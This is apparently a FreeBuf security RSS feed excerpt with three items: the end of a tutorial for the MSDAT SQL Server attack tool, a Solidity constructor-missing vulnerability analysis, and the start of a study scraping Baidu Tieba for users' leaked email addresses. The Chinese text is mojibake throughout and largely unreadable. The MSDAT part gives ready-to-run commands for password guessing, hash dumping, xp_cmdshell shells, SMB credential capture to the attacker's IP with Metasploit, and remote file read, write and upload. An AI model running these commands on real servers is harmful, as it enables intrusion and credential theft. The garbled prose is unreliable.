1147<pre><code>./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info</code></pre>
1148<h3>passwordguesser模å—</h3>
1149<p>这个模å—å¯ä»¥æœç´¢æœ‰æ•ˆå‡è¯ï¼š</p>
1150<pre><code>./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE--force-retry –search</code></pre>
1151<p>ä½ è¿˜å¯ä»¥æŒ‡å®šå¸å·æ–‡ä»¶ï¼š</p>
1152<pre><code>./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt--force-retry</code></pre>
1153<h3>passwordstealer模å—</h3>
1154<p>导出哈希密ç :</p>
1155<pre><code>./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump--save-to-file test.txt</code></pre>
1156<h3>xpcmdshell模å—</h3>
1157<p>利用xpcmdshellæ¨¡å—æ‰§è¡Œç³»ç»Ÿå‘½ä»¤ï¼š</p>
1158<pre><code>./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –shell</code></pre>
1159<p>如果没有å¯ç”¨xpcmdshellçš„è¯ï¼Œä½ å¯ä»¥åˆ©ç”¨â€œ–enable-xpcmdshellâ€œæ¥æ¿€æ´»æ¨¡å—:</p>
1160<h3>./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD –enable-xpcmdshell–disable-xpcmdshell –disable-xpcmdshell –shell</h3>
1161<h3>smbauthcapture模å—</h3>
1162<p>获å–SMBå‡è¯ï¼š</p>
1163<pre><code>./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture$MY_IP_ADDRESS --share-name SHARE</code></pre>
1164<p>ä½ è¿˜å¯ä»¥é…åˆMetasploitçš„auxiliary/server/capture/smb模å—一起使用:</p>
1165</p>
1166<pre><code>msf> use auxiliary/server/capture/smb
1167msfauxiliary(smb) > exploit</code></pre>
1168</p>
1169<h3>oleautomation模å—</h3>
1170<p>这个模å—å¯ä»¥è¯»å†™æ•°æ®åº“æœåС噍ä¸å˜å‚¨çš„æ–‡ä»¶ï¼š</p>
1171<pre><code>./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE--read-file 'C:\Users\Administrator\Desktop\temp.txt'</code></pre>
1172<p>å‘ç›®æ ‡æ–‡ä»¶è¿œç¨‹å†™å…¥å—符串:</p>
1173<pre><code>./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE--write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'</code></pre>
1174<p>文件下载:</p>
1175<pre><code>./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file'C:\Users\Administrator\Desktop\temp.txt' temp.txt</code></pre>
1176<p>æ–‡ä»¶ä¸Šä¼ ï¼š</p>
1177<pre><code>./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-filetemp.txt 'C:\Users\Administrator\Desktop\temp.txt</code></pre>
1178<h2>å…¶ä»–</h2>
1179<p>如需了解完整的模å—使用方法,请直接访问MSDATçš„ã€<a href="https://github.com/quentinhardy/msdat">GitHub主页</a>】以获å–详细信æ¯ã€‚</p>
1180<p><b style="color: rgb(159, 163, 168);">*å‚è€ƒæ¥æºï¼š<a href="https://github.com/quentinhardy/msdat">msdat</a>,FBå°ç¼–Alpha_h4ck编译,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1181]]></content:encoded>
1182 <wfw:commentRss>http://www.freebuf.com/sectool/177187.html/feed</wfw:commentRss>
1183 <slash:comments>1</slash:comments>
1184 </item>
1185 <item>
1186 <title>æž„é€ å‡½æ•°ç¼ºå¤±æ¼æ´žåˆ†æž</title>
1187 <link>http://www.freebuf.com/vuls/178574.html</link>
1188 <comments>http://www.freebuf.com/vuls/178574.html#comments</comments>
1189 <pubDate>Wed, 25 Jul 2018 06:00:26 +0000</pubDate>
1190 <dc:creator>BUGX</dc:creator>
1191 <category><![CDATA[区å—链安全]]></category>
1192 <category><![CDATA[æ¼æ´ž]]></category>
1193 <category><![CDATA[以太åŠ]]></category>
1194 <category><![CDATA[函数]]></category>
1195
1196 <guid isPermaLink="false">http://www.freebuf.com/?p=178574</guid>
1197 <description><![CDATA[一ã€å‰è¨€ æž„é€ å‡½æ•°ç¼ºå¤±æ¼æ´žè‡ªæ™ºèƒ½åˆçº¦äº§ç”Ÿä»¥æ¥å°±ä¸€ç›´å‡ºçŽ°ï¼Œå½’æ ¹åˆ°åº•æ˜¯ç”±äºŽæ–°è¿›å¼€å‘者对 solidity 代ç 结构ä¸ç†Ÿæ‚‰é€ æˆçš„。BUGX.IO团队本次就æ¥ä»‹ç»ä¸€ä¸‹æ¼æ´žçš„基本原ç†ã€è¡¨çް形å¼ä»¥åŠå¯¹å¼€å‘者的建议。 äºŒã€æ¼æ´žåŽŸç† 1. ä»€ä¹ˆæ˜¯æž„é€ å‡½æ•° Solidity编写åˆçº¦å’Œé¢å‘对象编程è¯è¨€éžå¸¸ç›¸ä¼¼ï¼Œæˆ‘们å¯ä»¥é€šè¿‡æž„é€ å‡½æ•°ï¼ˆconstructor)æ¥åˆå§‹åŒ–åˆçº¦å¯¹è±¡ã€‚æž„é€ å‡½æ•°å°±æ˜¯æ–¹æ³•åå’Œåˆçº¦åå—相åŒçš„函数,创建åˆçº¦æ—¶ä¼šè°ƒç”¨æž„é€ å‡½æ•°å¯¹çŠ¶æ€å˜é‡è¿›è¡Œæ•°æ®åˆå§‹åŒ–æ“作。 æž„é€ å‡½æ•°å¯ç”¨çš„函数类型为 public 或 internal,如果有 payable 修饰,就åªèƒ½æ˜¯ public 类型。而大部分人的写法都是 public 或者ä¸å†™ã€‚ä¸å†™ç±»åž‹åˆ™ç”±å‡½æ•°å¯è§æ€§é»˜è®¤ä¸º public ç±»åž‹ã€‚åŒæ—¶ï¼Œå¦‚æžœæž„é€ å‡½æ•°å¸¦å‚æ•°ï¼Œåˆ™ä¸€å®šè¦æ”¾åœ¨åˆçº¦ä¸‹çš„第一个函数。 pragma solidity 0.4.21;contract Foo {  function Foo() public {    // ...  }} åˆçº¦ç»“构的规范化写作å¯ä»¥è®©å…¶ä»–人更好地阅读,并且 constructor å’Œ fallback å‡½æ•°è¦æ”¾åœ¨å‰é¢ä»¥ä¾¿æ›´å¥½åœ°æŸ¥çœ‹ã€‚官方建议以如下顺åºå†™ä½œï¼š * constructor * fallback function (if exists) * external * public * internal * private åˆçº¦ç»“构的规范写法如下: contract A { constructor() public { ... } function() external { ... } // External functions // ... // External functions that are view // ... // External functions that are pure // ... // Public functions // ... // Internal functions // ... // Private functions // ... } 2. æž„é€ å‡½æ•°ç¼ºå¤±ä¸Žå±å®³ æž„é€ å‡½æ•°ç¼ºå¤±åˆ™æ˜¯ç”±äºŽæž„é€ å‡½æ•°ä¸Žåˆçº¦åå—ä¸åŒï¼Œè€Œåˆä¸º […]]]></description>
1198 <content:encoded><![CDATA[<h2><b>一ã€å‰è¨€</b></h2>
1199<p style="text-align: justify;"><b style="color: rgb(0, 176, 80);">æž„é€ å‡½æ•°ç¼ºå¤±æ¼æ´žè‡ªæ™ºèƒ½åˆçº¦äº§ç”Ÿä»¥æ¥å°±ä¸€ç›´å‡ºçŽ°ï¼Œå½’æ ¹åˆ°åº•æ˜¯ç”±äºŽæ–°è¿›å¼€å‘者对 solidity 代ç 结构ä¸ç†Ÿæ‚‰é€ æˆçš„。BUGX.IO团队本次就æ¥ä»‹ç»ä¸€ä¸‹æ¼æ´žçš„基本原ç†ã€è¡¨çް形å¼ä»¥åŠå¯¹å¼€å‘者的建议。</b></p>
1200<h2><b style=""><span style="color: rgb(51, 51, 51);">äºŒã€æ¼æ´žåŽŸç†</span></b></h2>
1201<h3><strong style="color: rgb(0, 112, 192);">1. ä»€ä¹ˆæ˜¯æž„é€ å‡½æ•°</strong></h3>
1202<p style="text-align: justify;">Solidity编写åˆçº¦å’Œé¢å‘对象编程è¯è¨€éžå¸¸ç›¸ä¼¼ï¼Œæˆ‘们å¯ä»¥é€šè¿‡æž„é€ å‡½æ•°ï¼ˆconstructor)æ¥åˆå§‹åŒ–åˆçº¦å¯¹è±¡ã€‚æž„é€ å‡½æ•°å°±æ˜¯æ–¹æ³•åå’Œåˆçº¦åå—相åŒçš„函数,创建åˆçº¦æ—¶ä¼šè°ƒç”¨æž„é€ å‡½æ•°å¯¹çŠ¶æ€å˜é‡è¿›è¡Œæ•°æ®åˆå§‹åŒ–æ“作。</p>
1203<p><img alt="图片1.png" src="http://image.3001.net/images/20180724/15324144179270.png!small" width="690" height="114"></p>
1204<p style="text-align: justify;">æž„é€ å‡½æ•°å¯ç”¨çš„函数类型为 public 或 internal,如果有 payable 修饰,就åªèƒ½æ˜¯ public 类型。而大部分人的写法都是 public 或者ä¸å†™ã€‚ä¸å†™ç±»åž‹åˆ™ç”±å‡½æ•°å¯è§æ€§é»˜è®¤ä¸º public ç±»åž‹ã€‚åŒæ—¶ï¼Œå¦‚æžœæž„é€ å‡½æ•°å¸¦å‚æ•°ï¼Œåˆ™ä¸€å®šè¦æ”¾åœ¨åˆçº¦ä¸‹çš„第一个函数。</p>
1205</p>
1206<pre><code><p>pragma solidity 0.4.21;</p><p>contract Foo {</p><p> function Foo() public {</p><p> // ...</p><p> }</p><p>}</p></code></pre>
1207<p style="text-align: justify;">åˆçº¦ç»“构的规范化写作å¯ä»¥è®©å…¶ä»–人更好地阅读,并且 constructor å’Œ fallback å‡½æ•°è¦æ”¾åœ¨å‰é¢ä»¥ä¾¿æ›´å¥½åœ°æŸ¥çœ‹ã€‚官方建议以如下顺åºå†™ä½œï¼š</p>
1208<p style="text-align: justify;">* constructor</p>
1209<p style="text-align: justify;">* fallback function (if exists)</p>
1210<p style="text-align: justify;">* external</p>
1211<p style="text-align: justify;">* public</p>
1212<p style="text-align: justify;">* internal</p>
1213<p style="text-align: justify;">* private</p>
1214<p style="text-align: justify;">åˆçº¦ç»“构的规范写法如下:</p>
1215<pre><code>contract A {
1216 constructor() public {
1217 ...
1218 }
1219
1220 function() external {
1221 ...
1222 }
1223
1224 // External functions
1225 // ...
1226
1227 // External functions that are view
1228 // ...
1229
1230 // External functions that are pure
1231 // ...
1232
1233 // Public functions
1234 // ...
1235
1236 // Internal functions
1237 // ...
1238
1239 // Private functions
1240 // ...
1241}<br /></code></pre>
1242<h3><strong>2. æž„é€ å‡½æ•°ç¼ºå¤±ä¸Žå±å®³</strong></h3>
1243<p style="text-align: justify;">æž„é€ å‡½æ•°ç¼ºå¤±åˆ™æ˜¯ç”±äºŽæž„é€ å‡½æ•°ä¸Žåˆçº¦åå—ä¸åŒï¼Œè€Œåˆä¸º public ç±»åž‹ï¼Œå°±å˜æˆäº†ä¸€ä¸ªå…¬æœ‰å‡½æ•°äº†ï¼Œå¯ä»¥è¢«ä»»ä½•äººè°ƒç”¨ï¼Œä¸€èˆ¬å‡½æ•°å‡½æ•°æ¯”è¾ƒæ•æ„Ÿï¼Œç”¨äºŽåˆå§‹åŒ–åˆçº¦æ—¶å®šä¹‰é€šè¯æ•°é‡ã€ç®¡ç†å‘˜åœ°å€ç‰åŸºæœ¬å˜é‡çжæ€ï¼Œä¸€æ—¶å˜æˆäº†å…¬æœ‰å‡½æ•°ï¼Œå±å®³å¯æƒ³è€ŒçŸ¥ï¼Œæƒé™æŽ§åˆ¶ã€é€šè¯ç®¡ç†åŸºæœ¬å…¨çº¿å¥”溃。</p>
1244<h3><strong>3. 版本å‡çº§åŽæž„é€ å‡½æ•°çš„å˜åŒ–</strong></h3>
1245<p style="text-align: justify;">从 `0.4.22`版本开始,solidity 编译器引入了 constructors 关键å—,以替代低版本的将åˆçº¦åä½œä¸ºæž„é€ å‡½æ•°åçš„è¯æ³•,é¿å…程åºå‘˜å®¹æ˜“出现的编ç 错误。使用旧写法会出现 warning ä¿¡æ¯ã€‚</p>
1246<p style="text-align: justify;">新版本写法为:</p>
1247<pre><code>contract Ownable {
1248 address public owner;
1249 address public admin;
1250
1251 constructor() public {
1252 owner = msg.sender;
1253 admin = msg.sender;
1254 }
1255
1256 // Other code
1257}<br /></code></pre>
1258<h2 style="text-align: justify;"><strong style=""><b style="color: rgb(51, 51, 51);">三ã€å¸¸è§æ¼æ´žä»£ç å½¢å¼</b></strong></h2>
1259<h3><strong style="">1. æž„é€ å‡½æ•°ä½¿ç”¨åº“åˆçº¦åç§°ï¼Œä½¿å¾—æž„é€ å‡½æ•°å˜æˆäº†å…¬æœ‰å‡½æ•°ï¼Œå¯è¢«ä»»æ„调用。</strong></h3>
1260<p style="text-align: justify;">我们å‘现了ä¸å°‘è¿™ç§é”™è¯¯å†™æ³•çš„åˆçº¦ï¼Œåœ¨ä¸»åˆçº¦ä¸ï¼Œæž„é€ å‡½æ•°å†™æˆäº† Token() 或 ERC20Token() ã€‚è¿™æ ·åçš„å‡½æ•°éžæž„é€ å‡½æ•°ï¼Œå˜æˆäº†æ™®é€šå‡½æ•°äº†ã€‚</p>
1261<p style="text-align: justify;">如 DealGuard åˆçº¦ï¼š </p>
1262<p style="text-align: justify;"><a href="https://etherscan.io//address/0xb47c5e8f389dc1fa8247c9a4b9e5dcdc79754152#code" ref="">https://etherscan.io//address/0xb47c5e8f389dc1fa8247c9a4b9e5dcdc79754152#code</a></p>
1263<p style="text-align: justify;"><img alt="2.png" src="http://image.3001.net/images/20180724/15324150224025.png!small" width="690" height="388"></p>
1264<h3><strong>2. åˆçº¦åä¸Žæž„é€ å‡½æ•°åä¸åŒï¼Œå¦‚大å°å†™ä¸åŒã€æ‹¼å†™é”™è¯¯ç‰ï¼Œä½¿å¾—æž„é€ å‡½æ•°å˜æˆäº†å…¬æœ‰å‡½æ•°ï¼Œå¯è¢«ä»»æ„人调用。</strong></h3>
1265<p style="text-align: justify;">åªèƒ½è¯´å¼€å‘者太大æ„,对智能åˆçº¦å¼€å‘有什么误解å§ã€‚ç»å¸¸çœ‹åˆ°çš„æ¼æ´žå½¢å¼æ˜¯åˆçº¦åä¸Žæž„é€ å‡½æ•°ä¸åŒï¼Œåªä¸Ž name å˜é‡å相åŒï¼Œä¼°è®¡æ˜¯å¼€å‘者以为åˆçº¦å相åŒå°±è¡Œäº†ï¼Œå´å¿½ç•¥äº†æž„é€ å‡½æ•°ã€‚</p>
1266<p style="text-align: justify;">如 ReaperCoin11 åˆçº¦ï¼š </p>
1267<p style="text-align: justify;"><a href="https://etherscan.io//address/0x1b7cd071187ec0b2995b96ee82296cfa639572f1#code">https://etherscan.io//address/0x1b7cd071187ec0b2995b96ee82296cfa639572f1#code</a></p>
1268<p style="text-align: justify;"><img alt="3.png" src="http://image.3001.net/images/20180724/15324150522639.png!small" width="690" height="233">还有这个 Krypticoin åˆçº¦ï¼Œä¹ä¸€çœ‹çœ‹ä¸å‡ºæ¥ï¼Œä»”细瞅瞅,å†ä»”ç»†çž…çž…ï¼ŒåŽŸæ¥ coin 拼错了 。</p>
1269<p style="text-align: justify;"><img alt="4 .png" src="http://image.3001.net/images/20180724/15324150726615.png!small" width="690" height="295"></p>
1270<p style="text-align: justify;">之å‰çŸ¥é“创宇å‘布了关于 `owned`大å°å†™ç¼–ç æ¼æ´žçš„æ–‡ç« ã€‚åŒæ—¶ï¼Œæˆ‘们也å¯ä»¥æ‰¾ä¸€äº›ç±»ä¼¼çš„容易大å°å†™é”™è¯¯çš„库åˆçº¦ï¼Œå¦‚ `ownable`。ä¸è¿‡ç»è¿‡æˆ‘们的分æžï¼Œè¿˜æ˜¯ä»¥ owned 大å°å†™é”™è¯¯ä¸ºä¸»ã€‚</p>
1271<p>如 MORPH åˆçº¦ï¼š</p>
1272<p><a href="https://etherscan.io//address/0x2ef27bf41236bd859a95209e17a43fbd26851f92#code">https://etherscan.io//address/0x2ef27bf41236bd859a95209e17a43fbd26851f92#code</a></p>
1273<pre><code>contract Owned {
1274 address public owner;
1275
1276 function owned() public {
1277 owner = msg.sender;
1278 }<br /></code></pre>
1279<h3><strong>3. constructor å‰åŠ äº†function ï¼Œæˆ–è€…åŠ äº† fucntion ç„¶åŽå¼€å¤´çš„ C写æˆäº†å¤§å†™ï¼Œå³ `function Constructor()public {}`ï¼Œä½¿å¾—æž„é€ å‡½æ•°å˜æˆäº†å…¬æœ‰å‡½æ•°ï¼Œå¯è¢«ä»»æ„人调用。</strong></h3>
1280<p style="text-align: justify;">版本å‡çº§åŽçš„æž„é€ å‡½æ•°åªéœ€è¦å•独使用 constructor å³å¯ï¼Œä½†å¾ˆå¤šå¼€å‘者å´å¿½ç•¥äº†æ¤ç»†èŠ‚ã€‚ä¸Šé¢è¿™ä¸ªå†™æ³•错误在于两点:</p>
1281<p style="text-align: justify;"><b>1) åŠ å…¥äº† function å˜æˆäº†æ™®é€šå‡½æ•°å½¢å¼ã€‚但是这时编辑器ä¸ä¼šæŠ¥ warning ä¿¡æ¯ï¼š</b></p>
1282<p style="text-align: justify;"><img alt="5.png" src="http://image.3001.net/images/20180724/15324151179429.png!small" width="690" height="102"></p>
1283<p style="text-align: justify;">但是有开å‘者忽了æ¤è¦å‘Šï¼Œå†™å‡ºäº†é”™è¯¯ä»£ç 。</p>
1284<p style="text-align: justify;">如 MDOT åˆçº¦ï¼š </p>
1285<p style="text-align: justify;"><a href="https://etherscan.io//address/0xef7d906fd1c0eb5234df32f40c6a1cb0328d7279#code">https://etherscan.io//address/0xef7d906fd1c0eb5234df32f40c6a1cb0328d7279#code</a></p>
1286<pre><code> function constructor() public {
1287 totalSupply = 5000000000000; // Set the total supply (in base units)
1288 balances[0xbfC729007CE9CBBE54132Fb9BFa097D80AAC791C] = 5000000000000; // Initially assign the entire supply to the specified account
1289 }<br /></code></pre>
1290<p style="text-align: justify;"><b>2) 但是如果将 `constructor`错写æˆäº† `Constructor`,使得编辑器识别其为普通函数å,没有任何 warning ä¿¡æ¯ã€‚</b></p>
1291<p style="text-align: justify;"><img alt="21.png" src="http://image.3001.net/images/20180724/15324152268008.png!small" width="228" height="38"></p>
1292<p style="text-align: justify;">如 TOGToken åˆçº¦ï¼š </p>
1293<p style="text-align: justify;"><a href="https://etherscan.io//address/0xb9d5c2548266428795fd8b1f12aedbdeb417fe54#code">https://etherscan.io//address/0xb9d5c2548266428795fd8b1f12aedbdeb417fe54#code</a></p>
1294<p><img alt="6.png" src="http://image.3001.net/images/20180724/15324152748498.png!small" width="690" height="285"></p>
1295<h2><strong style=""><b style=""><span style="color: rgb(51, 51, 51);">å››ã€å¸¸è§æ¼æ´žä»£ç å½¢å¼</span></b></strong></h2>
1296<p>使用新版本写法,并且检查å¥å¼ã€æ‹¼å†™çš„æ£ç¡®æ€§ã€‚</p>
1297<h2><strong style=""><b style=""><span style="color: rgb(51, 51, 51);">äº”ã€æ¼æ´žå½±å“范围</span></b></strong><br /></h2>
1298<p>通过我们对以太åŠä¸Šçš„åˆçº¦è¿›è¡Œæ•´ä½“监测,å‘çŽ°æœ‰æ¤æ¼æ´žçš„竟达两åƒå¤šä»½ï¼Œå¤§å°å†™ç¼–ç 错误的约有20 份。其ä¸ä¸ä¹æ£åœ¨ä½¿ç”¨ä¸çš„åˆçº¦ã€‚</p>
1299<h2><img alt="7.png" src="http://image.3001.net/images/20180724/15324153895084.png!small" width="690" height="571"><strong style=""><b style=""><span style="color: rgb(51, 51, 51);">å…ã€èµ„æ–™</span></b></strong><br /></h2>
1300<p style="text-align: justify;"><a href="https://solidity.readthedocs.io/en/latest/contracts.html?highlight=constructor#creating-contracts">https://solidity.readthedocs.io/en/latest/contracts.html?highlight=constructor#creating-contracts</a></p>
1301<p style="text-align: justify;"><a href="https://solidity.readthedocs.io/en/latest/style-guide.html?highlight=constructor#order-of-functions">https://solidity.readthedocs.io/en/latest/style-guide.html?highlight=constructor#order-of-functions</a></p>
1302<p style="text-align: justify;"><a href="https://ethereum.stackexchange.com/questions/30223/should-the-constructor-function-be-public">https://ethereum.stackexchange.com/questions/30223/should-the-constructor-function-be-public</a></p>
1303<p style="text-align: justify;"><a href="http://solidity.readthedocs.io/en/develop/contracts.html?highlight=private#visibility-and-getters">http://solidity.readthedocs.io/en/develop/contracts.html?highlight=private#visibility-and-getters</a></p>
1304<h2><span style="color: rgb(51, 51, 51);">七ã€å…¬å¸ä»‹ç» </span> <br /></h2>
1305<p style="text-align: justify;">BUGX.IO是一家致力于区å—链领域的安全公å¸ã€‚æ ¸å¿ƒå›¢é˜Ÿç»„å»ºäºŽ2014年,我们在区å—链生æ€å®‰å…¨ã€è¡Œä¸šè§£å†³æ–¹æ¡ˆã€å®‰å…¨å»ºè®¾ã€çº¢è“å¯¹æŠ—ç‰æ–¹é¢æœ‰æ·±åŽšç§¯ç´¯ä¸Žè¿‡ç¡¬ä¸“ä¸šç´ å…»ã€‚ </p>
1306<p><b style="color: rgb(159, 163, 168);">*本文作者BUGX.IO-Tri0nes,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1307]]></content:encoded>
1308 <wfw:commentRss>http://www.freebuf.com/vuls/178574.html/feed</wfw:commentRss>
1309 <slash:comments>4</slash:comments>
1310 </item>
1311 <item>
1312 <title>以百度贴å§ä¸ºå…¸åž‹çš„社交网络éšç§ä¸»åŠ¨æ³„éœ²åˆ†æž</title>
1313 <link>http://www.freebuf.com/articles/neopoints/178013.html</link>
1314 <comments>http://www.freebuf.com/articles/neopoints/178013.html#comments</comments>
1315 <pubDate>Wed, 25 Jul 2018 05:40:30 +0000</pubDate>
1316 <dc:creator>䏿œ½ä¸‰ä¸æœ½ä¸‰ä¸æœ½ä¸‰</dc:creator>
1317 <category><![CDATA[观点]]></category>
1318 <category><![CDATA[主动泄露]]></category>
1319 <category><![CDATA[百度贴å§]]></category>
1320 <category><![CDATA[社交网络]]></category>
1321 <category><![CDATA[éšç§æ³„露]]></category>
1322
1323 <guid isPermaLink="false">http://www.freebuf.com/?p=178013</guid>
1324 <description><![CDATA[*æœ¬æ–‡ä½œè€…ï¼šä¸æœ½ä¸‰ä¸æœ½ä¸‰ä¸æœ½ä¸‰ï¼Œæœ¬æ–‡å±ž FreeBuf 原创奖励计划,未ç»è®¸å¯ç¦æ¢è½¬è½½ã€‚ 楼主:我有æ»ä¾2资æºï¼Œè¦çš„ç•™é‚®ç®±ï¼ åƒç“œçš„æˆ‘:楼主好人一生平安~01010101@qq.com,谢谢。 æŸä¸ªé—²çš„æ— èŠçš„人:  site:tieba.baidu.com 01010101@qq.com  本文主è¦ä»¥ç™¾åº¦è´´å§å’Œå¾®åšä¸ºä¾‹ï¼Œåˆ†æžæŽ¢è®¨ç¤¾äº¤ç½‘络上的éšç§ä¸»åŠ¨æ³„éœ²çŽ°è±¡ã€‚ 一ã€ä¸»è¦æ€è·¯ 如果是针对个体用户,比如已知个人信æ¯ï¼Œä¸”这个信æ¯å¯ä»¥ä¸Žå…¶ç¤¾äº¤ç½‘络ä¸çš„æŸè´¦æˆ·å½¢æˆå•射关系。那么利用信æ¯Xæž„é€ payload,直接使用百度的siteè¯æ³•å¯¹ç›®æ ‡SNS进行检索å³å¯ã€‚ æ¤æ—¶ä¸ä¸€å®šèƒ½å¤ŸèŽ·å–足够的数æ®ï¼Œå› 为å•ä¸€ç›®æ ‡æ˜¯å¦æ›¾æ³„露éšç§æ˜¯ä¸€ä¸ªæœªçŸ¥æ•°ï¼Œå…¶SNSä½¿ç”¨æ·±åº¦ä¹Ÿæ˜¯æœªçŸ¥æ•°ã€‚å› æ¤ï¼Œæ”¹ä½¿ç”¨æ•感信æ¯çš„通é…体进行检索,先获å–用户集åˆï¼Œå†èŽ·å–å‘言情况。具体æµç¨‹å¦‚下: 二ã€é’ˆå¯¹å•一用户的工具实现 å› ä¸ºä»£ç æ°´å¹³å¤ªå·®æˆ‘就䏿”¾github了,emmmm其实就是简å•的爬虫,具体的架构如下: éƒ¨åˆ†æ ¸å¿ƒåŠŸèƒ½ä»£ç åŠæ³¨é‡Šå¦‚下: 那么完æˆçš„æ•ˆæžœå°±æ˜¯ï¼Œè¾“å…¥æŸä¸€ä¸ªä¿¡æ¯ï¼Œå®ƒè¿”å›žç»™ä½ æŒ‡å®šç¤¾äº¤ç½‘ç»œä¸ä¸Žå…¶ç›¸å…³çš„ç”¨æˆ·ã€‚ä½ ç¡®å®šç”¨æˆ·å,它继ç»çˆ¬å–该用户的所有å‘言记录。以åŽç¿»ä¸œè¥¿å†ä¹Ÿä¸ç”¨è‡ªå·±æ…¢æ…¢æ‰¾äº†~ å¦å¤–由于比较懒,åªåšäº†è´´å§åŠå¾®åšä¸¤ä¸ªSNS ä¸‰ã€æ€è·¯æŽ¨å¹¿ï¼Œå³èŽ·å–大釿•°æ®çš„æ–¹æ³• 说起æ¥éº»çƒ¦ï¼Œå…¶å®žå°±æ˜¯ç®€å•替æ¢äº†ä¸ªpayload,ä¸å†å±€é™äºŽçœ‹æŸä¸ªäººï¼Œè€Œæ˜¯ummmä½ ä»¬è¿™äº›ç•™è¿‡é‚®ç®±çš„éƒ½ç»™æˆ‘è¿‡æ¥ã€‚最åŽå¦‚上图所说,拿了个23MB的文本。 ç”±äºŽæœ‰å¤§é‡æ£åˆ™æ“ä½œï¼Œçˆ¬è™«è·‘çš„å¾ˆæ…¢ï¼Œåœ¨äº‘ä¸Šè·‘äº†æœ‰ä¸ªå››äº”å¤©æ‰æŠŠè¿™ä¸ƒåƒå¤šä¸ªç”¨æˆ·è·‘å®Œã€‚åŠ äº†å¤šçº¿ç¨‹ä½†æ˜¯ä¼¼ä¹Žæ²¡æœ‰ä»€ä¹ˆæ”¹å–„ï¼Ÿ å››ã€æ–‡æœ¬è¯æ–™å¤„ç† 4.1 è¯æ–™é¢„处ç†åŠåŽç»æ“作 æ¤æ—¶æ‰‹é‡Œæœ‰ä¸€å¤§æ‰¹ä¸»åŠ¨æ³„éœ²ä¸ªäººéšç§çš„用户å‘言,那当然è¦åˆ†æžä¸€æ³¢ã€‚分æžå‰ï¼Œå…ˆæ´—ä¸€æ³¢è¯æ–™ï¼Œä¹‹åŽåˆ†è¯åŠ å‘é‡åŒ–ã€‚å…·ä½“ä¸»è¦æ¥éª¤å¦‚下: 去åœç”¨è¯æœ‰ç”¨æ£åˆ™æœ‰ç”¨ç»“巴,具体åœç”¨è¯åº“æ˜¯å‡ ä¸ªé™¢æ ¡çš„åˆè®¢ç‰ˆã€‚å‘é‡åŒ–直接word2vec,其实SNSå‘言包å«å¤§é‡çš„çŸè¯å’ŒçŸå¯¹è¯ï¼Œä½¿ç”¨æ–‡æœ¬å‘é‡å¯èƒ½æ›´å¥½ï¼Œä½†ç¬”者技术有é™ä¹Ÿæ¯”较懒,直接分è¯ç”¨è¯å‘é‡åšäº†ã€‚ 4.2 对照组选择 对照组的选择其实比较麻烦,按æ£å¸¸æ¥è¯´ï¼Œæ¤æ—¶èŽ·å¾—çš„æ˜¯ä¸»åŠ¨æ³„éœ²éšç§çš„ä¸å®‰å…¨ç”¨æˆ·çš„å‘è¨€ï¼Œä½ å¯¹ç…§è¯¥é€‰ä¸ªå®‰å…¨ç”¨æˆ·ã€‚å¯å®‰å…¨ç”¨æˆ·å¤ªéš¾ç•Œå®šäº†ï¼Œå³æˆ‘找到一æ¡ä½ 留有个人éšç§çš„å‘è¨€ä½ å°±æ˜¯ä¸å®‰å…¨çš„,å¯ä½ è¦æ‰€æœ‰å‘è¨€éƒ½æ²¡æœ‰é—®é¢˜æ‰æ˜¯å®‰å…¨çš„。这里å·å·¥å‡æ–™é€‰ç”¨2012å¹´ccf的微åšåˆ†æžæ–‡æœ¬ã€‚é•¿è¿™ä¸ªæ ·å: 4.3 å¯è§†åŒ–结果 其实å‘é‡åŒ–过程ä¸ï¼Œåˆå§‹æ˜¯3M+个300ç»´å‘é‡ï¼Œç„¶åŽé™ç»´åˆ°äºŒç»´çš„è¯ï¼Œæˆ‘çš„å°ç ´æœ¬æœ‰ç‚¹è·‘ä¸åŠ¨ï¼Œå°±åœ¨åˆ†è¯é˜¶æ®µæŒ‰ç…§æƒé‡å…ˆåšäº†ä¸ªç›é€‰ã€‚对更具有代表性的若干个å‘é‡è¿›è¡Œäº†é™ç»´ã€‚如下图所示,这是å‰ä¸‰æ¬¡ï¼š å¯ä»¥çœ‹åˆ°è“è‰²å¯¹ç…§ç»„ï¼Œæ¤æ—¶å˜åœ¨å°è§„模的èšç±»æƒ…况,这是由于对照组文本本身具有一定的è¯é¢˜æ€§ã€‚ 而当æƒé‡ä¸ºTop20k时,对照情况如下: 与之å‰ä¸‰æ¬¡å®žéªŒæœ‰æ‰€ä¸åŒï¼Œéšç€è€ƒè™‘范围的扩大,对照组的å°è§„模èšç±»æƒ…å†µä¹Ÿé€æ¸æ¶ˆå¤±ã€‚两组å‘é‡åˆ†å¸ƒèŒƒå›´æŽ¥è¿‘ï¼Œæ— æ˜Žæ˜¾å·®å¼‚ã€‚æ¤æ—¶è¯æ˜Žï¼ŒSNSéšç§æ‚–论导致的泄露éšç§ç”¨æˆ·ï¼Œåœ¨å‘è¨€ä¸Šä¸Žä¸€èˆ¬ç”¨æˆ·æ— æ˜Žæ˜¾å·®å¼‚ï¼Œå‘è¨€æ— æ˜Žæ˜¾èšç±»ã€‚å³é€šè¿‡å‘è¨€åˆ¤æ–æŸç”¨æˆ·æ˜¯å¦å˜åœ¨å®‰å…¨éšæ‚£ï¼Œä¸å¯è¡Œã€‚ 